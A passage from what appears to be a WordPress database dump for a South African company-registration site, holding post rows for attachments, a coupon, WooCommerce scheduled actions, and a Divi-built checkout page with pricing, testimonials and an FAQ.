09:05:42','',0,'https://companyregistration.online/wp-content/uploads/2019/07/cropped-companyregistration-business-card-e1457804924754-1.png',0,'attachment','image/png',0),(31601,3,'2019-07-22 11:05:57','2019-07-22 09:05:57','https://companyregistration.online/wp-content/uploads/2019/07/cropped-cropped-companyregistration-business-card-e1457804924754-1.png','cropped-cropped-companyregistration-business-card-e1457804924754-1.png','','inherit','open','closed','','cropped-cropped-companyregistration-business-card-e1457804924754-1-png','','','2019-07-22 11:05:57','2019-07-22 09:05:57','',0,'https://companyregistration.online/wp-content/uploads/2019/07/cropped-cropped-companyregistration-business-card-e1457804924754-1.png',0,'attachment','image/png',0),(31605,1,'2019-07-22 11:17:14','2019-07-22 09:17:14','','WINTKBISMB','For ebook: What I need to know...','publish','closed','closed','','wintkbismb','','','2019-07-22 11:21:30','2019-07-22 09:21:30','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=31605',0,'shop_coupon','',0),(33149,0,'2019-08-22 18:11:15','2019-08-22 18:11:15','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ee19ef12c04.52398741-IRdTfWqq7XbqKAz4JYHAo680UmJQM5V6','','','2019-08-22 20:40:30','2019-08-22 18:40:30','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33149',0,'scheduled-action','',3),(33151,0,'2019-08-22 19:40:31','2019-08-22 19:40:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ef6d5034ab6.94968643-5qkykDmNUdtcTUxF8L4bIABPn5SZ3zTl','','','2019-08-22 22:11:01','2019-08-22 20:11:01','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33151',0,'scheduled-action','',3),(33153,0,'2019-08-22 21:11:01','2019-08-22 21:11:01','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f0774255073.89370636-VsHYSRHxVxr1ucQk4huyA58HRb5LsG55','','','2019-08-22 23:21:56','2019-08-22 21:21:56','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33153',0,'scheduled-action','',3),(33155,0,'2019-08-22 22:21:56','2019-08-22 22:21:56','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f24fb4db461.90829787-Ps093ynCkbBvp5KSkJ13htLVHlUZAMRN','','','2019-08-23 01:27:55','2019-08-22 23:27:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33155',1,'scheduled-action','',3),(33157,0,'2019-08-23 00:27:55','2019-08-23 00:27:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f36bdba00a6.07121093-3K5tRYYqwaQyc2ePNWIjm4LX44aS4tB7','','','2019-08-23 02:43:41','2019-08-23 00:43:41','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33157',0,'scheduled-action','',3),(33159,0,'2019-08-23 01:43:41','2019-08-23 01:43:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f47c01a3e82.14470094-UjezQbpavKQffWlkr7k3IqZ8IP63BGnd','','','2019-08-23 03:56:16','2019-08-23 01:56:16','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33159',0,'scheduled-action','',3),(33161,0,'2019-08-23 02:56:16','2019-08-23 02:56:16','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f57f4567a71.42294057-vtBr0fwAk0bCJS36DGLObX3Mz1lC2CZ3','','','2019-08-23 05:05:24','2019-08-23 03:05:24','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33161',1,'scheduled-action','',3),(33163,0,'2019-08-23 04:05:24','2019-08-23 04:05:24','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f66f488dee0.97871741-hYV2B9fyP3SzhgAqzE2aelqPWdRz4TRg','','','2019-08-23 06:09:24','2019-08-23 04:09:24','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33163',1,'scheduled-action','',3),(33165,0,'2019-08-23 05:09:24','2019-08-23 05:09:24','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f7661531f68.20347679-gRXfEV014FSzApDkr6kc5BUeau6wqq3r','','','2019-08-23 07:15:13','2019-08-23 05:15:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33165',0,'scheduled-action','',3),(33167,0,'2019-08-23 06:15:13','2019-08-23 06:15:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f8568c2d207.23519422-h9Yo6444r9Ky65aLfI7ilXg02IOfrrvw','','','2019-08-23 08:19:20','2019-08-23 06:19:20','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33167',0,'scheduled-action','',3),(33169,0,'2019-08-23 07:19:20','2019-08-23 07:19:20','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5f945f4789c1.56910115-QNFdvrgGErrmcgrgClp1hn394LimXyjv','','','2019-08-23 09:23:11','2019-08-23 07:23:11','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33169',0,'scheduled-action','',3),(33171,0,'2019-08-23 08:23:11','2019-08-23 08:23:11','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5fa39e8d7da4.83651334-NSn2mIDc1x1hqwQF55zOUsP3xmO8zpCl','','','2019-08-23 10:28:14','2019-08-23 08:28:14','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33171',1,'scheduled-action','',3),(33173,0,'2019-08-23 09:28:14','2019-08-23 09:28:14','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5fb1b82a52b6.78139593-qFMZGJ3T0bekk8UFsV5KmAmRH6snADDB','','','2019-08-23 11:28:24','2019-08-23 09:28:24','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33173',0,'scheduled-action','',3),(33175,0,'2019-08-23 10:28:24','2019-08-23 10:28:24','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5fc66e945cc6.34528185-B7lib8jhqJkDsqi71tsZMDwI3nmUfAvB','','','2019-08-23 12:56:46','2019-08-23 10:56:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33175',1,'scheduled-action','',3),(33177,0,'2019-08-23 11:56:46','2019-08-23 11:56:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5fd62e5018b9.93775328-f1PcP9GvCFC9OVMNsIa6xhQ4LvbI2xwQ','','','2019-08-23 14:03:58','2019-08-23 12:03:58','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33177',0,'scheduled-action','',3),(33179,0,'2019-08-23 13:03:58','2019-08-23 13:03:58','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5fe64c5f0671.05051302-FMqhz2US143HaISlGE0Xs0TzyTGJW0js','','','2019-08-23 15:12:44','2019-08-23 13:12:44','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33179',0,'scheduled-action','',3),(33181,0,'2019-08-23 14:12:44','2019-08-23 14:12:44','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ff9d7d891d2.88837797-oLqS5yJOZxeRdOZ3nsidjDBlPm7q8EXa','','','2019-08-23 16:36:07','2019-08-23 14:36:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33181',0,'scheduled-action','',3),(33183,0,'2019-08-23 15:36:07','2019-08-23 15:36:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d600b15cd45a3.04857079-81gaQfCSp5HkEu46SrjGkgyi2fLQZ22a','','','2019-08-23 17:49:41','2019-08-23 15:49:41','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33183',0,'scheduled-action','',3),(33185,0,'2019-08-23 16:49:41','2019-08-23 16:49:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6023b8442263.59008001-qtcuJcipaYZ8QMPawPRWn67HwR94evk5','','','2019-08-23 19:34:48','2019-08-23 17:34:48','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33185',1,'scheduled-action','',3),(33187,0,'2019-08-23 18:34:48','2019-08-23 18:34:48','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60320b5fdd28.88045318-VgFl5g0Q2H1M3B1CRlof372u18bcLuEJ','','','2019-08-23 20:35:55','2019-08-23 18:35:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33187',1,'scheduled-action','',3),(33189,0,'2019-08-23 19:35:55','2019-08-23 19:35:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60409c0ae8d5.65558347-BEGxF0GH6p7ZKlmvs05SdSCJGnVm5pbg','','','2019-08-23 21:38:04','2019-08-23 19:38:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33189',0,'scheduled-action','',3),(33191,0,'2019-08-23 20:38:04','2019-08-23 20:38:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d604edc027784.06629637-2rNjlIj9RWMgXtvfTHC0tteqRbvDe4QV','','','2019-08-23 22:38:52','2019-08-23 20:38:52','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33191',0,'scheduled-action','',3),(33193,0,'2019-08-23 21:38:52','2019-08-23 21:38:52','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d605f0256b894.42837736-xG9EC8ckBRKJGuRnB7XqfYwg1M1Nyukj','','','2019-08-23 23:47:46','2019-08-23 21:47:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33193',0,'scheduled-action','',3),(33195,0,'2019-08-23 22:47:46','2019-08-23 22:47:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6072847cd0a4.65858899-ZUQDzvVCenkJr4cyvuYf33jCLqw2BFQH','','','2019-08-24 01:11:00','2019-08-23 23:11:00','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33195',1,'scheduled-action','',3),(33197,0,'2019-08-24 00:11:00','2019-08-24 00:11:00','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d608309837dc0.29235318-sBkmggxXuHD1TUFxlkJiFpECaXRriTwd','','','2019-08-24 02:21:29','2019-08-24 00:21:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33197',0,'scheduled-action','',3),(33199,0,'2019-08-24 01:21:29','2019-08-24 01:21:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60962b9ad7e7.51189703-YjqeZlrCtDqqVuWDl53IpI1lOnoX6ZxL','','','2019-08-24 03:43:07','2019-08-24 01:43:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33199',0,'scheduled-action','',3),(33201,0,'2019-08-24 02:43:07','2019-08-24 02:43:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60a7efcaea93.93321535-xXJmLGKRcUAgfqrf2b3bTOfVfkg0oS1h','','','2019-08-24 04:58:55','2019-08-24 02:58:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33201',0,'scheduled-action','',3),(33203,0,'2019-08-24 03:58:55','2019-08-24 03:58:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60c6220677c0.21289860-xZn8C8pDzyzjJtZdlYsLigmAeFa05ySr','','','2019-08-24 07:07:46','2019-08-24 05:07:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33203',1,'scheduled-action','',3),(33205,0,'2019-08-24 06:07:46','2019-08-24 06:07:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60d5fcca3dc8.13994292-AY60VYFTF5rLPhcmHKcb0vFC5crntXFM','','','2019-08-24 08:15:24','2019-08-24 06:15:24','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33205',0,'scheduled-action','',3),(33207,0,'2019-08-24 07:15:24','2019-08-24 07:15:24','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60e481ef0d99.61272120-yCXlklhsioMCjPMZB3rKRy1vWwlBfLYx','','','2019-08-24 09:17:21','2019-08-24 07:17:21','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33207',0,'scheduled-action','',3),(33209,0,'2019-08-24 08:17:22','2019-08-24 08:17:22','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60f2bfc37663.66006494-KJHlrdSpHJvdXfexiYPeDO856Rh1O4Io','','','2019-08-24 10:18:07','2019-08-24 08:18:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33209',1,'scheduled-action','',3),(33211,0,'2019-08-24 09:18:07','2019-08-24 09:18:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d610125748c29.93394430-AqtjUpyH6QOM9T8M9EaOStpEqDx2JJaB','','','2019-08-24 11:19:33','2019-08-24 09:19:33','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33211',0,'scheduled-action','',3),(33213,0,'2019-08-24 10:19:33','2019-08-24 10:19:33','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d611097690346.87409185-T4prMEdqivf5YiQaW9XG2VOOb7sCWDQW','','','2019-08-24 12:25:27','2019-08-24 10:25:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33213',0,'scheduled-action','',3),(33215,0,'2019-08-24 11:25:27','2019-08-24 11:25:27','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d611f8d4b89b7.95181298-Wo1kZXQvMvSX6yMfLIS3BSlSuT4zD44e','','','2019-08-24 13:29:17','2019-08-24 11:29:17','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33215',0,'scheduled-action','',3),(33217,0,'2019-08-24 12:29:17','2019-08-24 12:29:17','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d612e11c37ea9.80258256-CORRLPm7AoGrs7aKiuGAXu7Xh3zl6o0U','','','2019-08-24 14:31:13','2019-08-24 12:31:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33217',0,'scheduled-action','',3),(33220,0,'2019-08-24 13:31:13','2019-08-24 13:31:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d613c2f5eb265.31445429-jBHZIIfpQW3yqnL2igvpzjnWYzOMXbZC','','','2019-08-24 15:31:27','2019-08-24 13:31:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33220',0,'scheduled-action','',3),(33221,0,'2019-08-24 13:31:13','2019-08-24 13:31:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d613c2f6cb847.30694804-O7IKWufcgegfKZdAr3NbA9guFxdJGlzq','','','2019-08-24 15:31:27','2019-08-24 13:31:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33221',0,'scheduled-action','',3),(33239,0,'2019-08-24 13:31:25','2019-08-24 13:31:25','{\"webhook_id\":2,\"arg\":33236}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d613c2fb57d37.54663088-zMTxLNGOc4EmoIjs23sKpG04n1ZsoknK','','','2019-08-24 15:31:27','2019-08-24 13:31:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33239',0,'scheduled-action','',3),(33313,0,'2019-08-26 09:45:34','2019-08-26 09:45:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d63add378fd08.53536208-rcVMbSgLsjZMy0YrRKV8Yvcos8zTFsUr','','','2019-08-26 12:00:51','2019-08-26 10:00:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33313',0,'scheduled-action','',3),(33314,0,'2019-08-26 09:45:34','2019-08-26 09:45:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d63add38a4967.21580761-9kHP9VgahH8agZKVumFEsAMS1Glec19V','','','2019-08-26 12:00:51','2019-08-26 10:00:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33314',0,'scheduled-action','',3),(33318,0,'2019-08-26 11:00:51','2019-08-26 11:00:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d63bd29e664d4.79834898-f5gsJE5pzfRUjIztoO0gEsFOVzF9nNFQ','','','2019-08-26 13:06:17','2019-08-26 11:06:17','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33318',0,'scheduled-action','',3),(33219,1,'2019-08-24 14:19:07','2019-08-24 12:19:07','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"rgba(196,0,121,0.96)\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png\" min_height=\"310px\" custom_padding=\"33px||170px|||\" custom_padding_tablet=\"50px||130px\"][et_pb_row column_structure=\"1_4,1_2,1_4\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0|0px|0|0px|false|false\" make_equal=\"on\" module_class=\"vertical-align-middle\" _builder_version=\"3.26.3\" width=\"94%\" max_width=\"1917px\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/CoReg-Insane-Offer-Conversion-Ad.jpg\" _builder_version=\"3.26.3\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"43px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_horizontal_length=\"0.12em\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-22px||||false|false\" text_line_height_last_edited=\"on|desktop\"]<h3>Get Your Company Registered for <span style=\"color: #ffffff;\">R199</span></h3>\r\n<p><span style=\"font-size: xx-large;\">Save an Incredible R551</span></p>[/et_pb_text][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"40px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" custom_margin=\"-10px||||false|false\" text_line_height_last_edited=\"on|desktop\"]<p>Indecision can be exhausting start your business today</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Headline: Features & Benefits\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"25px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"28px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\"]<h3>Features &amp; Benefits</h3>[/et_pb_text][et_pb_blurb title=\"Simple, Convenient & Professionally done\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Clinically Tested Formula\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][et_pb_blurb title=\"100% Money back Guarantee\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: 100% Guaranteed Weight Gain\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][et_pb_blurb title=\"Professional consultants ready to assist\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Best Results For Regular Consumption\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px||120px||false|false\" custom_padding_tablet=\"||50px\" custom_padding_phone=\"||30px\" custom_margin=\"-174px||||false|false\" make_equal=\"on\" custom_padding_last_edited=\"on|phone\" padding_top_bottom_link_2=\"true\" padding_left_right_link_1=\"true\" padding_left_right_link_2=\"true\" _builder_version=\"3.26.3\" border_radii=\"on|20px|20px|20px|20px\" border_width_all=\"1px\" border_color_all=\"rgba(255,255,255,0)\" box_shadow_style=\"preset1\" box_shadow_horizontal=\"-13px\" box_shadow_vertical=\"-11px\" box_shadow_blur=\"16px\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" background_color=\"#f9f9f9\" custom_padding=\"30px|40px|50px|40px\" custom_padding_tablet=\"|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|desktop\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Checkout  Shortcode\" _builder_version=\"3.19.11\"][cartflows_checkout][/et_pb_code][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" background_color=\"#edeef2\" custom_padding=\"40px|40px|40px|40px\" custom_padding_tablet=\"30px|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|phone\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Money Back Image\" _builder_version=\"3.26.3\" max_width=\"30%\" module_alignment=\"left\" custom_margin=\"||20px|0px|false|false\" custom_padding=\"|||0px|false|false\" filter_hue_rotate=\"14deg\" filter_saturate=\"200%\" filter_brightness=\"107%\" filter_contrast=\"81%\"][/et_pb_image][et_pb_text admin_label=\"Headline and Text: 30 Days Full Refund Policy.\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Poppins|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>100% Money Back. No-Risk.</h3>\r\n<h3>Full Refund Policy.</h3>\r\nNo Risk guarantee, if you not happy at any time, prior to registration of your company, we will refund you 100%, no questions asked.[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Success Stories\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>Success Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" custom_margin=\"-15px||||false|false\" body_line_height=\"1.3em\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" custom_margin=\"-15px||||false|false\" body_line_height=\"1.3em\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" custom_margin=\"||20px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.3\" custom_margin=\"-50px||||false|false\"]<p>[hurrytimer id=\"31525\"]</p>[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.26.3\" height=\"46px\" custom_margin=\"-14px||20px||false|false\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" open=\"off\"]<p>Once the order is made an email will be sent containg all the all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\"][et_pb_row column_structure=\"1_2,1_2\" custom_margin=\"-43px||||false|false\" _builder_version=\"3.26.3\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web-e1563787290497.png\" _builder_version=\"3.26.3\" width=\"54%\" max_width=\"54%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\"][et_pb_text _builder_version=\"3.26.3\"]<p style=\"text-align: right;\">@2018</p>\r\n<p style=\"text-align: right;\">Powered By: Digital Power Solutions (Pty)Ltd</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','SA Company Registration Checkout','','inherit','closed','closed','','33135-revision-v1','','','2019-08-24 14:19:07','2019-08-24 12:19:07','',33135,'https://companyregistration.online/33135-revision-v1/',0,'revision','',0),(33231,0,'2019-08-24 13:11:08','2019-08-24 13:11:08','[33230]','wc-admin_import_order','','publish','open','closed','','scheduled-action-5d61377ba2ef97.74926611-T1sNjG5Dq4I9VP38o2BRN9kMn7O4ZMUH','','','2019-08-24 